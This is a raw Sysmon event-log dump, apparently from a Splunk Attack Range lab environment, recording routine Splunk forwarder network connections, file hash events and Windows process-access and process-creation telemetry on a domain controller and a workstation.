10:33:50.586{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51140-false10.0.1.12-8000- 23542300x8000000000000000284648Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:54.438{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0AEA4E94855B61FF884CB291CF03917,SHA256=A3DAF815D941FD59BDECBCD40934699429710DC0FD905A4EC5B47AC6F3EF483E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213754Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:54.024{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA9E8808DDE04CF4D3051DEC76430770,SHA256=B7E67A16AD55C3346FB4B7E7B7D0892E50BA2900B3FC87FA6E1814ACD8BC00E0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284647Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:54.328{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-F674-6215-5C01-000000003802}6072C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284646Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:54.328{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-F674-6215-5C01-000000003802}6072C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284645Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:54.328{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-F674-6215-5C01-000000003802}6072C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284644Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:54.313{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F674-6215-5D01-000000003802}5016C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284643Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:54.313{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F674-6215-5D01-000000003802}5016C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284642Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:54.313{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F674-6215-5D01-000000003802}5016C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284641Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:54.313{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F674-6215-5D01-000000003802}5016C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000284650Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:53.525{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53191-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000284649Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:55.453{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D04C94E411871ED6B1CA25D97C497CE6,SHA256=740C7743163741DE9D5778AD5AF96DA17881426CB51961AD6622D44B1705625E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213755Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:55.055{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DC6A87C8249DBA52179246F31B67E71,SHA256=5EF8721993161A1F478602D862CB47AA88BB90757276B943DEA1D2ED154B07D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284651Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:56.485{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ACF4248C3D66884CA38D5D2907BBFC8,SHA256=DB2E9EAF89ED41CDD9A1FFAB1FFF1CC7E3424AA3122C0BE5350551F0516B8014,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213756Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:56.071{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C9EDC6B42BA9130C8976DD5E4FFA348,SHA256=5AE31FA1197C771F737FA56F28BAEC8BEE2684A5812579DAC37FF283C585F0D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284652Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:57.500{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC14D49F085471F29083C365AE03FF68,SHA256=27F9C88A26BE42CADC19F32482D308E0B80FF852EFA8D7F6A8350A69E8FA6C44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213757Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:57.086{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03A51BA5E73B2471020C283476355402,SHA256=E5B007D0F226B1F42723770C1FCF73D6F84B6E102BC10859806F2AAD358B5CBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284653Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:58.516{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D36EA80F58A808F31FB98DA0DB3F329,SHA256=1B7780BD1B5C5C08747B74051E80D2501F304AF7E7E2FAFDE77606C30BE31797,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213759Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:56.570{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51141-false10.0.1.12-8000- 23542300x8000000000000000213758Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:58.164{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDDFE71553BFDCCE1B8C4A9C9D25F461,SHA256=B3266343250AD0B30DC9F38F5CDBEECD26610F8A9BCF891318976066021928EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284654Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:59.532{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BCBCDFF5EF4A163678F385812FBA338,SHA256=D957BA13EA3BAD25EB013A71301A5222EC5729F05483FCB9A220C4436263E8D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213760Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:59.336{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C83031637DBBBE9E6F569177AECAD29,SHA256=26BE057E691CE8F46B569D0A3B13B0BBCD4BB2CB9C62FFDD7DA4D2E466D1CD02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284655Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:00.594{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE1C897CCEFB4632A947EDD27D271DB7,SHA256=D3E11BD07A9EE0F47C54103E6A68D81457282EBC169B7FAF07576D44F044EC29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213761Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:00.399{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A951DDDC0B4D74588A7989CF79B2599,SHA256=86E0F5E98841F28400DCFC01CE342AA73B6233750F960B9B0125780EC930C795,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213762Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:01.618{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=700BE90845FBD8A7C6FABE66DFF0CDD9,SHA256=C0F2631E87EB548A770565490FE71E49C5B652492D5A04E523CE0CE41A7E7722,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284656Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:01.594{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B4A4529B0CBE5767A579A511FD3374C,SHA256=9BA20F0313943067CFDCC8C1ED7E23E1E6B88A940AF8DC8104521ECD390A3DED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213763Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:02.633{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31BD56641D40CECB499EDCF6286841D3,SHA256=3A9A7D5F9B4249B8535E6E16C3DBB6B8DAF17A2FFBC27990C1296FE4DB95CA9C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284675Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:02.703{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0D9A-6216-9104-000000003802}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284674Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:02.703{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284673Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:02.703{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284672Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:02.703{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284671Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:02.703{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284670Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:02.703{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-0D9A-6216-9104-000000003802}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284669Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:02.703{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0D9A-6216-9104-000000003802}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000284668Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:02.704{C8EA50B7-0D9A-6216-9104-000000003802}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000284667Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:02.610{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20D1795096C473241CAFAAC2A40DDB5E,SHA256=27FC5D157BC3E9049222CFCE5002804044B6088504CF16BF803B6CBC38706E2E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284666Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:02.453{C8EA50B7-0D9A-6216-9004-000000003802}43645864C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284665Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:02.188{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0D9A-6216-9004-000000003802}4364C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284664Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:02.188{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 